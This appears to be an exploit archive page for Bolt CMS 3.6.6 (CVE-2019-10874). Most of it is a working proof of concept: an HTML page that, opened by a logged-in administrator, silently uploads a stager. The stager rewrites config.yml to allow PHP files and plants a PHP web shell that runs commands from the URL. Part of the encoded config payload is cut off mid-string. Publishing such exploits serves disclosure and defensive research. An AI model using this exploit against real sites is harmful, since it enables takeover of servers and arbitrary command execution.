what you don't know can hurt you

Bolt CMS 3.6.6 Cross Site Request Forgery / Code Execution

Bolt CMS 3.6.6 Cross Site Request Forgery / Code Execution
Posted Apr 8, 2019
Authored by Felipe Gaspar

Bolt CMS version 3.6.6 suffers from cross site request forgery and code execution vulnerabilities.

tags | exploit, vulnerability, code execution, csrf
advisories | CVE-2019-10874
MD5 | 64aa4f32a9e9165b16e9ca3b86e6f171

Bolt CMS 3.6.6 Cross Site Request Forgery / Code Execution

Change Mirror Download
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function exploit() {

var target = "http://127.0.0.1"

var bolt_admin_url = target + "/bolt";

var xhr = new XMLHttpRequest();
xhr.open("POST", bolt_admin_url + "/upload", true);
xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------130713229751679908527494159");
xhr.withCredentials = true;
var body = "-----------------------------130713229751679908527494159\r\n" +
"Content-Disposition: form-data; name=\"files[]\"; filename=\"stager.html\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"\x3cscript\x3e\r\n" +
"\r\n" +
"function exploit(){\r\n" +
"\r\n" +
" var bolt_admin_url = \""+bolt_admin_url+"\";\r\n" +
"\r\n" +
" var xhr = new XMLHttpRequest();\r\n" +
" \r\n" +
" if(xhr) {\r\n" +
" xhr.open(\'GET\', bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" +
" xhr.onreadystatechange = handler;\r\n" +
" xhr.send();\r\n" +
" }\r\n" +
"\r\n" +
" function handler(){\r\n" +
" if (xhr.readyState == 4 && xhr.status == 200) {\r\n" +
" user_page = document.createElement(\'html\');\r\n" +
" user_page.innerHTML = xhr.responseText;\r\n" +
" token_input = (user_page.getElementsByTagName(\'input\')[0]).value;\r\n" +
" console.log(\"Token obtained:\" + token_input);\r\n" +
" ModifyAllowedExtensions(token_input);\r\n" +
" UploadShell();\r\n" +
" }\r\n" +
" }\r\n" +
"\r\n" +
" function ModifyAllowedExtensions(token) {\r\n" +
"\r\n" +
" var xhr = new XMLHttpRequest();\r\n" +
" xhr.open(\"POST\", bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" +
" xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" +
" xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" +
" xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n" +
" xhr.withCredentials = true;\r\n" +
" var body = \"file_edit%5B_token%5D=\"+token+\"&file_edit%5Bcontents%5D=%23+Database+setup.+The+driver+can+be+either+\\\'sqlite\\\'%2C+\\\'mysql\\\'+or+\\\'postgres\\\'.%0D%0A%23%0D%0A%23+For+SQLite%2C+only+the+databasename+is+required.+However%2C+MySQL+and+PostgreSQL%0D%0A%23+also+require+\\\'username\\\'%2C+\\\'password\\\'%2C+and+optionally+\\\'host\\\'+(+and+\\\'port\\\'+)+if+the+database%0D%0A%23+server+is+not+on+the+same+host+as+the+web+server.%0D%0A%23%0D%0A%23+If+you\\\'re+trying+out+Bolt%2C+just+keep+it+set+to+SQLite+for+now.%0D%0Adatabase%3A%0D%0A++++driver%3A+sqlite%0D%0A++++databasename%3A+bolt%0D%0A%0D%0A%23+The+name+of+the+website%0D%0Asitename%3A+A+sample+site%0D%0Apayoff%3A+The+amazing+payoff+goes+here%0D%0A%0D%0A%23+The+theme+to+use.%0D%0A%23%0D%0A%23+Don\\\'t+edit+the+provided+templates+directly%2C+because+they+_will_+get+updated%0D%0A%23+in+next+releases.+If+you+wish+to+modify+a+default+theme%2C+copy+its+folder%2C+and%0D%0A%23+change+the+name+here+accordingly.%0D%0Atheme%3A+base-2018%0D%0A%0D%0A%23+The+locale+that\\\'ll+be+used+by+the+application.+If+no+locale+is+set+the%0D%0A%23+fallback+locale+is+\\\'en_GB\\\'.+For+available+options%2C+see%3A%0D%0A%23+https%3A%2F%2Fdocs.bolt.cm%2Fother%2Flocales%0D%0A%23%0D%0A%23+In+some+cases+it+may+be+needed+to+specify+(non-standard)+variations+of+the%0D%0A%23+locale+to+get+everything+to+work+as+desired.%0D%0A%23%0D%0A%23+This+can+be+done+as+%5Bnl_NL%2C+Dutch_Netherlands%5D+when+specifying+multiple%0D%0A%23+locales%2C+ensure+the+first+is+a+standard+locale.%0D%0Alocale%3A+en_GB%0D%0A%0D%0A%23+Set+the+timezone+to+be+used+on+the+website.+For+a+list+of+valid+timezone%0D%0A%23+settings%2C+see%3A+http%3A%2F%2Fphp.net%2Fmanual%2Fen%2Ftimezones.php%0D%0A%23+timezone%3A+UTC%0D%0A%0D%0A%23+Set+maintenance+mode+on+or+off.%0D%0A%23%0D%0A%23+While+in+maintenance+mode%2C+only+users+of+level+editor+or+higher+can+access+the%0D%0A%23+site.%0D%0A%23%0D%0A%23+All+other+visitors+are+presented+with+a+notice+that+the+site+is+currently%0D%0A%23+offline.%0D%0A%23%0D%0A%23+The+default+template+file+can+be+found+in+%2Fapp%2Ftheme_defaults%2F+and+overridden%0D%0A%23+with+this+option+using+your+own+theme.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.%0D%0A%23+++++++If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Amaintenance_mode%3A+false%0D%0Amaintenance_template%3A+maintenance_default.twig%0D%0A%0D%0A%23+The+hour+of+the+day+for+the+internal+cron+task+scheduler+to+run+daily%2C+weekly%2C%0D%0A%23+monthly+and+yearly+jobs.%0D%0A%23%0D%0A%23+Default%3A+3+(3+am)%0D%0Acron_hour%3A+3%0D%0A%0D%0A%23+If+your+site+is+reachable+under+different+urls+(say%2C+both+blog.example.org%2F%0D%0A%23+as+well+as+example.org%2F)%2C+it\\\'s+a+good+idea+to+set+one+of+these+as+the%0D%0A%23+canonical%2C+so+it\\\'s+clear+which+is+the+primary+address+of+the+site.%0D%0A%23%0D%0A%23+If+you+include+%60https%3A%2F%2F%60%2C+it+will+be+included+in+the+canonical+urls.%0D%0A%23canonical%3A+example.org%0D%0A%0D%0A%23+Bolt+can+insert+a+%3Clink+rel%3D%22shortcut+icon%22%3E+for+all+pages+on+the+site.%0D%0A%0D%0A%23+Note%3A+The+location+given+is+relative+to+the+currently+selected+theme.+If%0D%0A%23+++++++you+want+to+set+the+icon+yourself%2C+just+don\\\'t+enable+the+following+line.%0D%0A%23favicon%3A+images%2Ffavicon-bolt.ico%0D%0A%0D%0A%23+The+default+content+to+use+for+the+homepage%2C+and+the+template+to+render+it%0D%0A%23+with.+This+can+either+be+a+specific+record+(like+%60page%2F1%60)+or+a+listing+of%0D%0A%23+records+(like+%60entries%60).+In+the+chosen+\\\'homepage_template\\\'%2C+you+will+have%0D%0A%23+%60record%60+or+%60records%60+at+your+disposal%2C+depending+on+the+\\\'homepage\\\'+setting.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on%0D%0A%23+++++++the+website%2C+be+sure+to+check+for+a+theme.yml+file+in+your+theme\\\'s%0D%0A%23+++++++folder.+If+a+template+is+set+there%2C+it+will+overri
" var aBody = new Uint8Array(body.length);\r\n" +
" for (var i = 0; i \x3c aBody.length; i++)\r\n" +
" aBody[i] = body.charCodeAt(i); \r\n" +
" xhr.send(new Blob([aBody]));\r\n" +
" }\r\n" +
"\r\n" +
" function UploadShell() {\r\n" +
" var xhr = new XMLHttpRequest();\r\n" +
" xhr.open(\"POST\", bolt_admin_url + \"/upload\", true);\r\n" +
" xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" +
" xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" +
" xhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=---------------------------130713229751679908527494159\");\r\n" +
" xhr.withCredentials = true;\r\n" +
" var body = \"-----------------------------130713229751679908527494159\\r\\n\" + \r\n" +
" \"Content-Disposition: form-data; name=\\\"files[]\\\"; filename=\\\"shell.php\\\"\\r\\n\" + \r\n" +
" \"Content-Type: text/plain\\r\\n\" + \r\n" +
" \"\\r\\n\" + \r\n" +
" \"\\x3c?php echo(system($_GET[\\\'cmd\\\'])); ?\\x3e\\n\" + \r\n" +
" \"\\r\\n\" + \r\n" +
" \"-----------------------------130713229751679908527494159--\\r\\n\";\r\n" +
" var aBody = new Uint8Array(body.length);\r\n" +
" for (var i = 0; i \x3c aBody.length; i++)\r\n" +
" aBody[i] = body.charCodeAt(i); \r\n" +
" xhr.send(new Blob([aBody]));\r\n" +
" }\r\n" +
" }\r\n" +
"\r\n" +
" exploit();\r\n" +
"\r\n" +
"\x3c/script\x3e\r\n" +
"\n" +
"\r\n" +
"-----------------------------130713229751679908527494159--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));

setTimeout(function() {
var dateObj = new Date();
var folder = dateObj.getFullYear() + "-" + (String("00"+(dateObj.getMonth()+1)).slice(-2));
document.getElementById('stager').src = target + "/files/"+folder+"/stager.html";
console.log("Called stager! Wait a moment and access: " + target + "/files/" + folder + "/shell.php?cmd=whoami");
}, 2000);

}

window.onload = function() {
exploit();
};

</script>
<iframe id="stager" style="width:0;height:0;border:0;border:none" src=""></iframe>
</body>
</html>


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    14 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close